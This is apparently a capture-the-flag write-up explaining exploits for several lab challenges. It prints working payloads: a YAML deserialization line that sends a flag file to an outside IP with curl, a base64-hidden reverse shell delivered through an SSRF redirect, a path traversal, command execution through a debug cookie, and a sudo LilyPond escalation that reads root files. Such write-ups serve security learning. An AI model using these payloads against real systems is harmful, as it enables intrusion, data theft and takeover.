πͺARCENT Best Cyber Warrior 2023
Quick challenge writeups for the CTF to explain exploitation.
CyberCompose
Vulnerable to https://www.rapid7.com/db/modules/exploit/multi/fileformat/nodejs_js_yaml_load_code_exec/ Rapid7
Payload:
!!python/object/apply:os.popen ['curl -X POST http://159.223.147.201/ --data "$(cat /app/RanDomflagN4m3.txt)"']Confuser
Vulnerable to https://github.com/advisories/GHSA-ffqj-6fqr-9h24
Intruder
It was a hassle setting up my own https server for it and couldn't use self signed certs because it did not have insecure option enabled on the vulnerable webserver.
Was able to get YAML deserialization with this php redirect to get the SSRF and exploit working:
<?php header('Location: http://127.0.0.1:5000/yaml/ISFweXRob24vb2JqZWN0L25ldzpXYXJuaW5nCnN0YXRlOgogIGV4dGVuZDogISFweXRob24vbmFtZTpleGVjCmxpc3RpdGVtczogJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKCIxNTkuMjIzLjE0Ny4yMDEiLDgwKSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO2ltcG9ydCBwdHk7IHB0eS5zcGF3bigic2giKSc%3D'); ?>S7R34M5
from scapy.all import *
import sys
#take in file name from argument
file = sys.argv[1]
#open file
f = open(file, "r")
# Define the source and destination IP addresses
source_ip = "192.168.245.129"
destination_ip = "192.168.1.7"
# Define an array to store the data bytes
data_array = []
packets = rdpcap(file)
def process_packet(packet):
# find all UDP packets from 192.168.245.129 to 192.168.1.7 and get the data byte and add to array and print array
if packet.haslayer(IP) and packet.haslayer(UDP) and packet[IP].src == source_ip and packet[IP].dst == destination_ip:
data = packet[Raw].load
data_array.append(data)
# Process each packet in the pcap file
for packet in packets:
process_packet(packet)
# merge the array and print
data = b''.join(data_array)
print(str(data, 'utf-8'))LeakyPond
Initial Access
Path traversal: /vendor/nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../var/www/html/debugger_infra-temp.php
Debug was still enabled and would execute system on the debug cookie value.
RCE:
GET /index.php?debug_infra=1 HTTP/1.1
Host: wcom5p6v45jax3g1w93xkxdt7vr86dv91gp0c43l-web.cybertalentslabs.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Cookie: debug=ls
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
X-PwnFox-Color: blueUsed Ivan Sincek PHP reverse shell for more stable environment.
Priv Esc
$ echo "JSBjb21iaW5lcyBzaGVsbCBleGVjdXRpb24gd2l0aCBmaWxlIHJlYWRpbmcKJSB0byBnZXQgc29tZXRoaW5nIGxpa2UgYW4gaW50ZXJhY3RpdmUgc2hlbGwKIyhkZWZpbmUgcyAiIikKIyhzeXN0ZW0gImNhdCAvcm9vdC9mbGFnKiA+IC90bXAvZmxhZ3oiKQojKGxldCogICgoZiAob3Blbi1pbnB1dC1maWxlICIvdG1wL3F3ZXJ0eWFzZGYiKSkKICAgICAgICAoYyAjXHNwYWNlKSkKICAod2hpbGUgKG5vdCAoZW9mLW9iamVjdD8gYykpCiAgKHNldCEgcyAoc3RyaW5nLWFwcGVuZCBzIChzdHJpbmcgYykpKQogIChzZXQhIGMgKHJlYWQtY2hhciBmKSkpKQpcbmV3IFN0YWZmIDw8e2deI3MKfT4+" | base64 -d > test.ly
$ sudo /opt/lilypond/bin/lilypond test.ly
Processing `test.ly'
Parsing...
test.ly:1: warning: no \version statement found, please add
\version "2.23.82"
for future compatibility
Interpreting music...
Preprocessing graphical objects...
Finding the ideal number of pages...
Fitting music on 1 page...
Drawing systems...
Converting to `test.pdf'...
Success: compilation successfully completed
$ ls
flagz
qwertyasdf
test.ly
test.pdf
$ cat flagz
flag{ZAE324RTHJNBVCXWQZ34568UHBVCX}
$SayingPlease
Simply change the base64 encoded authentication token from user to admin and the index.php page will display the flag.
Last updated
Was this helpful?